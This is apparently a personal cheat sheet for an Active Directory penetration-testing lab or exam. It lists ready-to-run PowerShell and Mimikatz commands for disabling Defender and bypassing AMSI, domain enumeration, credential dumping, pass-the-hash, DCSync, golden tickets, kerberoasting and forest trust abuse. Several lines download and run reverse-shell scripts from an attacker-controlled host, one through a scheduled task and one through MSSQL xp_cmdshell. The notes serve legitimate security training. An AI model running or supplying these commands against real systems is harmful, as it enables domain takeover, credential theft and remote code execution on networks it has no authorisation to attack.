AMSI Bypass

<Redacted>
# your lab notes will have the latest one! 

Disable Defender

# need to be Local Admin
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -Disablerealtimemonitoring $true
"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsilnitFailed','NonPublic,Static').SetValue($null,$true)"

Open Firewall Port

# need admin priv
New-NetFirewallRule -DisplayName 'HTTP-Inbound' -Profile @('Domain', 'Private') -Direction Inbound -Action Allow -Protocol TCP -LocalPort @('80', '443')

Enumeration

Get-NetComputer | Get-NetShare # get all the shares in the domain; use Get-DomainComputer with the latest PowerView script

Get-NetDomain # get info about current domain
Get-NetDomain -Domain forest.local # list info about a specific domain
Get-DomainSID # get domain sid 

(Get-DomainPolicy) 
(Get-DomainPolicy)."system access" # list password policy
(Get-DomainPolicy -domain domain.local)."system access" # password policy for any other domain

Get-NetDomainController # get domain controllers for the current domain

Get-NetUser # get list of users
Get-NetUser -Username userX #list info about specific user
get-netuser | ?{$_.Name -match "userX"} # only for a specific user
Get-netuser | findstr "userX" # to only find a specific string everywhere
Get-NetUser | select -ExpandProperty samaccountname # expand a single property; replace samaccountname with any other property name to list only that property

Get-UserProperty # list properties of users in current domain
Get-UserProperty -Properties pwdlastset 
Get-UserProperty -Properties logoncount # useful for spotting honeypot accounts

Find-UserField -SearchField Description -SearchTerm "built" # find a specific string in users attribute

Get-NetComputer
Get-NetComputer -Operating System "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData

Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-NetGroup *admin* ## list all groups containing admin
Get-NetGroup "*Admins" -Domain domain.local | Get-NetGroupMember -Domain domain.local  # list the members of all groups with Admins in their name

Get-NetGroupMember -GroupName "Domain Admins" -Recurse
Get-NetGroupMember -GroupName "Domain Admins"
Get-NetGroupMember -GroupName "Enterprise Admins" # no output because the group is not part of our local domain (dc.domain.forest.local)
Get-NetGroupMember -GroupName "*Admins" -Domain domain.local  # prints only the Schema Admins and not the Enterprise Admins

Invoke-ShareFinder -verbose # list interesting shares 
Invoke-FileFinder -Verbose
Get-NetFileServer # get all file servers of the domain (high-privilege servers only)

Get-NetGPO 
Get-NetGPO | select displayname # only list the GPOs 
Get-NetGPO -ComputerName userX.domain.forest.local
Get-NetGPOGroup

Find-GPOComputerAdmin -Computername nameX.local  
Find-GPOLocation -UserName userX -Verbose 

Get-NetOU
Get-NetOU -FullData
Get-NetOU -FullData | select name,gplink
(Get-NetOU StudentMachines -FullData).gplink  # print only the complete gplink
Get-NetOU Xmachines # print the ldap path
Get-NetOU XMachines | %{Get-NetComputer -ADSPath $_}  # print user belonging to one specific OU

Get-NetGPO -GPOname "{}" # insert the gplink value here

# <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces> must check this in exam
Get-ObjectAcl -SamAccountName userX -ResolveGUIDs -verbose
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs   # group based acl search
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose  # search by ADS prefix
Get-ObjectAcl -ADSpath "LDAP://CN=XXX,CN=XXX,DC=XXXX,DC=XXX,DC=local" -ResolveGuids -Verbose  # search by LDAP path
Get-ObjectAcl -SamAccountName userY -ResolveGUIDs -verbose | ?{$_.IdentityReference -match "groupX"} # ActiveDirectory Rights for groupX group on the users named userY
(Get-NetOU StudentMachines).gplink  | %{Get-NetGPO -ADSPath $_} # enumerate GPO applied on student machines OU 
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} # enumerate ACLs for ALL GPOs
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ?{$_.IdentityReference -match "userX"}  #enumerate those GPOs where userX (can also use a group here) have interesting permissions
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "userX"} 

Invoke-ACLScanner -ResolveGUIDS # find interesting ACLs 

Get-PathAcl -Path "\\\\dc.domain.forest.local\\sysvol"

Get-NetDomainTrust
Get-NetDomainTrust -Domain domain.forest.local
Get-NetDomainTrust | ?{$_.TrustType -eq 'External'} # map only the external domain trusts

Get-NetForestDomain -Verbose | Get-NetDomainTrust # map all the trusts of a forest
Get-NetForestDomain -Verbose | Get-NetDomainTrust | ?{$_.TrustType -eq 'External'} # list only external trusts of a forest 
Get-NetForestDomain -Forest forest.local -Verbose | Get-NetDomainTrust 

Get-NetForest
Get-NetForest -Forest forest.local

Get-NetForestDomain 
Get-NetForestDomain -Forest forest.local

Get-NetForestCatalog
Get-NetForestCatalog -Forest forest.local

Get-NetForestTrust
Get-NetForestTrust -Forest forest.local

Find-LocalAdminAccess -Verbose
Find-PSRemotingLocalAdminAccess # need to import Find-PSRemotingLocalAdminAccess.ps1; much faster than the command above

Invoke-EnumerateLocalAdmin -verbose # find local admins, need admin on the current machine to run this

Invoke-UserHUnter -GroupName "groupX"

# use latest ingestor in exam, lab ingestor does not work properly
Invoke-Bloodhound -CollectionMethod All  
Invoke-Bloodhound -CollectionMethod LoggedOn -Verbose # not necessarily required but just for being sure, run this if sessions are missing
Invoke-Bloodhound -CollectionMethod All -ExcludeDC ## avoid detection like ATA
SharpHound.exe --CollectionMethod Session --Loop --Loopduration 03:09:41  # loop it to find all the sessions everywhere
MATCH (n:User), (m:Group {name: "DOMAIN [email protected]"}), p=shortestPath((n)-[*1..]->(m)) RETURN p  #shortest path to domain admins 
## use ou: gpo: computer, user group to enumerate on bloodhound

#forest search with bloodhound 
nltest /domain_trusts # find all the names
–domain # add this flag to enumerate all the forests

Local PrivEsc

#service abuse
Invoke-ServiceAbuse -Name AbyssWebServer -Username "domain\\userX" -verbose

# unquoted path abuse
Write-ServiceBinary -Name 'servicename' -Path  C:\\WebServer\\service.exe -Username domain\\userX -Password XX # the password needs to be complex
## log off the server to see the changes

Lateral Movement

powercat -l -v -p 443 -t 1000 #listener

Find-PSRemotingLocalAdminAccess 
Enter-PSSession -ComputerName nameX.domain.forest.local

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('<http://IP/tcprev.ps1>'));Power -Reverse -IPAddress IP -Port 443 # file loading in memory

Invoke-UserHunter -CheckAccess # after lateral movement pass powerview and run this
Invoke-Command -ScriptBlock{whoami} -ComputerName sv-nameX # if a session is allowed, run this on that system to check whether we have command execution

iex (New-Object Net.WebClient).Downloadstring('<http://IP/Find-PSRemotingLocalAdminAccess.ps1>')  # use this if the command below fails due to a BOM character
iex (iwr <http://IP/Invoke-Mimikatz.ps1> -UseBasicParsing) # load mimikatz in memory
$sess =New-PSSession -ComputerName sv-nameX.domain.forest.local # make a session in variable
# Enter-PSSession cannot be used over a reverse shell (command redirection error); use New-PSSession together with Invoke-Command for PowerShell Remoting
Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess #disable av 
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess #run mimikatz as a function on the sv-nameX server

Invoke-Mimikatz -Command '"sekurlsa::pth /user:userX /domain:domain.forest.local /ntlm:"NTLM/rc4_value" /run:powershell.exe"' # pass the hash attack via mimikatz 
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' # dump krbtgt 
Invoke-Mimikatz -Command '"lsadump::dcsync /all"' # complete dcsync
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.forest.local /sid:<domain-sid-value> /krbtgt:ff46XX id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' #golden ticket

# processes running with svcadmin as the service account
Get-WmiObject "win32_service" -Filter "StartName='domain\\\\admin'"
Get-Process -IncludeUserName # does the same thing as above

# APPLOCKER STUFF
$ExecutionCOntext.SessionState.LanguageMode # check for constrained language mode
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections # to get details on app locker

# check for DCSync Replication rights on userX
Get-ObjectAcl -DistinguishedName "dc=domain,dc=forest,dc=com" -ResolveGUIDs | ? {($_.IdentityReference -match "userX") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

# kerberoast
Get-NetUser –SPN  #TGS tickets cannot be passed using PTT 
Request-SPNTicket "MSSQLSvc/sv-nameX.domain.forest.local"
Invoke-Mimikatz -Command '"kerberos::list /export"'
python.exe .\\tgsrepcrack.py .\\10k-worst-pass.txt .\\2-40a10000-name1@MSSQLSvc~sv-name1.domain.forest.local-domain.forest.local.kirbi
# latest powerview 
Invoke-Kerberoast # dump the hash and crack with hashcat

# AS-Rep
Get-DomainUser -PreauthNotRequired -Verbose #pv_dev

#force AS-REP
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "GroupX"} # find users where we have generic all/write rights
Set-DomainObject -Identity userZ -XOR @{useraccountcontrol=4194304} –Verbose # set there pre auth
Get-DomainUser -PreauthNotRequired -Verbose # now when we check, those extra accounts show up as well

# AS-REP roast module
Get-ASREPHash -UserName VPN1user -Verbose # get single user hash, and then crack it using Hashcat/John 
Invoke-ASREPRoast -Verbose # to find all the preauth tickets together  

# Targeted Kerberoasting
Set-DomainObject -Identity userZ -Set @{serviceprincipalname='ops/whatever1'} # set a user's SPN where we have generic all/write permission
# now the password can be brute-forced locally

# unconstrained delegation
Get-NetUser -Unconstrained
Get-NetComputer -Unconstrained #(follow objective 17)

# printer bug (objective 17)
Copy-Item -ToSession $appsrv1 -Path C:\\AD\\Tools\\Rubeus.exe -Destination C:\\Users\\admin\\Downloads 
.\\Rubeus.exe monitor /interval:5 /targetuser:dc$ /nowrap #run in the session
.\\MS-RPRN.exe \\\\dc.domain.forest.local \\\\sv-name1.domain.forest.local # run on any domain user
.\\Rubeus.exe ptt /ticket:<val> #run from the local, val=base64 ticket found

# Constrained delegation (objective 18)
Get-DomainUser -TrustedToAuth #HTTP (WinRM), LDAP (DCSync), HOST (PsExec shell, scheduled tasks), MSSQLSvc (DB admin rights), Host and RPCSS (WMI)
# Check objective 18 for in detail reverse shells 
# <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation>
 

Forest Level Attacks

# Child domain to forest root 
## using Trust key 
Get-DomainSID -Domain forest.local # to get the SIDs value + add 519
Get-DomainSID # get the SID value
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.forest.local /sid:<Domain-SID> /sids:<Forest-SID>-519 /rc4:trust_key /service:krbtgt /target:forest.local /ticket:C:\\AD\\Tools\\trust_tkt.kirbi"'
Downloads\\Rubeus.exe asktgs /ticket:C:\\AD\\Tools\\trust_tkt.kirbi /service:cifs/dc.forest.local /dc:dc.forest.local /ptt
ls \\\\dc.forest.local\\c$

## using krbtgt 
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.forest.local /sid:<Domain-SID> /sids:<Forest-SID>-519 /krbtgt:<krbtgt-hash> /ticket:C:\\AD\\Tools\\krbtgt_tkt.kirbi"' # to save the ticket
Invoke-Mimikatz -Command '"kerberos::ptt C:\\AD\\Tools\\krbtgt_tkt.kirbi"'
gwmi -class win32_operatingsystem -ComputerName dc.forest.local
### to get a reverse shell
powercat -l -v -p 443 -t 1000 # get reverse shell 
schtasks /create /S dc.forest.local /SC Weekly /RU "NT Authority\\SYSTEM" /TN "task" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''<http://IP/Invoke-PowerShellTcp.ps1>''')'"
schtasks /Run /S dc.forest.local /TN "task" # to call the above task

# cross forest attacks
## inter-realm TGT 
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:domain.forest.local /sid:<domain-SID> /rc4:<trust_key_rc4> /service:krbtgt /target:cross_forest.local /ticket:C:\\AD\\Tools\\trust_forest_tkt.kirbi"'
.\\Rubeus.exe asktgs /ticket:C:\\AD\\Tools\\trust_forest_tkt.kirbi /service:cifs/cross-dc.cross-forest.local /dc:cross-dc.cross-forest.local /ptt
### now access the only allowed share
PS C:\\Users\\userX\\Desktop> Invoke-ShareFinder -Domain cross-forest.local -CheckShareAccess # to check accessible shares cross forest
ls \\\\cross-dc.cross-forest.local\\SharedwithCorp\\

MSSQL Abuse

## mssql 
Import-Module .\\PowerupSQL.ps1 #PowerUpSQL-master
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose # check accessibility 
### Manual crawling 
select * from master..sysservers
select * from openquery("DCORP-SQL1",'select * from master..sysservers') # run through dcorp-sql1
select * from openquery("DCORP-SQL1",'select * from openquery("DCORP-MGMT",''select * from master..sysservers'')') # run through dcorp-mgmt, and so on...
### Auto crawling
Get-SQLServerLinkCrawl -Instance dc-mssql.domain.forest.local -Verbose
### command execution
EXECUTE ('sp_configure "xp_cmdshell",1;reconfigure;') # to enable xp_cmdshell for command execution
Get-SQLServerLinkCrawl -Instance dcorp-mssql.domain.forest.local -Query "exec master..xp_cmdshell 'whoami'"
Get-SQLServerLinkCrawl -Instance dcorp-mssql.domain.forest.local -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''<http://IP/Invoke-PowerShellTcp.ps1>'')"' # reverse shell 

Misc

Command | ?{$_.param -match "Exact_keyword"} #replacement for grep <http://techgenix.com/dollar-sign-underscore-dot/>
(command).param  # works like the above command
Get-NetGroup "*Admins" -Domain forest.local | Get-NetGroupMember -Domain forest.local  # list all the groups members with admin in their group name
-ResolveGUIDs flag #indicates that any target GUIDs in the ACEs should be resolved to their human-readable names. <not a command>
move-item Powerview.ps1 Powerview.psm1 # renaming to .psm1 exposes the functions and cmdlets in PowerView as a module, which are otherwise not available
Convert-SidToName 'SID-value' # to check the username

# port already in use?
netstat -ano | findstr :<PORT>
taskkill /PID <PID> /F

# download a file on disk 
Invoke-WebRequest -Uri "<http://IP/file.ps1>" -OutFile "file.ps1"